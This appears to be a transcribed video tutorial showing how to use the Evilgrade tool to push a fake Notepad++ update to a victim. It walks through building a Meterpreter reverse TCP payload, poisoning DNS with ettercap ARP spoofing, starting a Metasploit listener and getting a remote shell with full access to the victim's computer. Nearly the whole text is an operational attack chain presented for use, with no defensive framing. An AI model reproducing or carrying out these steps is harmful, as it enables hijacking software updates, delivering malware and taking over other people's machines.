Hello friends, today we'll do a tutorial for a tool called Evilgrade. You can use this tool to exploit the vulnerability in update system of many tools. So let's see how we can do that. So first open a terminal and go to pentest directory, then exploit, then isr-evilgrade. Okay, I'll just do ls to see what kind of files are there. Now execute Evilgrade. So in Evilgrade we have modules for iTunes and Notepad++, QuickTime, even for Skype, WinMap, and you can even exploit a Mac operating system's update feature. It also have a plugin for Windows. It's somewhere I have seen it. Okay, so today we will exploit an update feature vulnerability in a program Notepad++. So where is it? Notepad, here it is, right? It's copy, and I type configure Notepad plus, right? Now we are in this prompt. If I type show options, so this is the agent, is some kind of payload, and basically by default it is, I think it's a netcat payload, but we'll use some other payload. We'll use meter reverse TCP, right? So I'll open another terminal and type msf payload, and we want to use Windows meter, then reverse underscore TCP. My IP is, I have to set my localhost IP, which is 192.168.232.140, and I want to run it on port number 444, and I want an output to a file called hack.exe, right? So apart of this, we also have to do an DNS poisoning. So we have to DNS poison this domain to our IP address. So when the victim try to update Notepad++, his request will be transferred to our domain, right? So uh, first we'll see this ettercaps file, DNS poisoning file. So that is etter.dns. So this is in this location. I just copy it and uh, gedit, paste it, so that file is open, right? So I'll come back to Evilgrade, and I'll copy this thing and I'll paste it here. It's an A record, and I want it to 192.168.232.140, my Windows, my backtracks IP. Then I'll just save it. Close it. There was a problem with our Windows meter. I misspelled it. METERPRE. I missed R. PRETER, right? It should create a file now. So meanwhile we'll type etter cap -t and -q -m, and m mode is ARP, then plugin is DNS underscore spoof, and my IP would be gateway is 192.168.232.2 and another my victim will be NA, right? So before firing this command I want to do something else. I have to start a listener, right? So msf console, I have to wait little bit for that. Meanwhile I'll set that payload output, so where this is created, right? So if I just ls, so this file is here. So uh, come here and say set agent type root slash hack dot exe, right? If I type show options, our payload is set. Okay, let's see Metasploit is loaded. Okay, so set type use multi slash handler, then set payload to Windows meterpreter reverse TCP, then set rhost 192.168.232.140 and fire the exploit. Sorry, I have to type lhost rather than rhost. Too much of remote exploitation. Anyways, exploit. So listener is started, right? And we'll just start our Evilgrade. So it's ready and waiting for the connection. Meanwhile, we'll go to air DNS poisoning tool at ettercap and fire this one also. So it should tell you activating DNS spoofing, right? So all set. Now we'll go to the victim's computer. We open Notepad++, and if I come here and if I type update Notepad++, it says an update package is available, right? And if I click on yes, it's saying it's downloading the update package, and it tells me I need to restart to continue, right? So I just clicked on yes and closed. So if I come back and to my Metasploit session, you see I got a meterpreter shell. You want to check sysinfo, and I have the complete access to that computer.